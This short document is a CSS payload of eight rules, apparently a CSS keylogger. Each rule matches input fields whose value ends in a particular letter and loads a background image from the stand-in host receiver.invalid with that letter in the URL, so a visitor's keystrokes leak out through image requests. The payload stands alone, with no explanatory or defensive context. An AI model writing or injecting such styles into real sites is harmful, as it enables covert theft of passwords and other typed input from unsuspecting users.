input[value$="a"] { background: url(https://receiver.invalid/key/a.png); }
input[value$="b"] { background: url(https://receiver.invalid/key/b.png); }
input[value$="c"] { background: url(https://receiver.invalid/key/c.png); }
input[value$="d"] { background: url(https://receiver.invalid/key/d.png); }
input[value$="e"] { background: url(https://receiver.invalid/key/e.png); }
input[value$="f"] { background: url(https://receiver.invalid/key/f.png); }
input[value$="g"] { background: url(https://receiver.invalid/key/g.png); }
input[value$="h"] { background: url(https://receiver.invalid/key/h.png); }
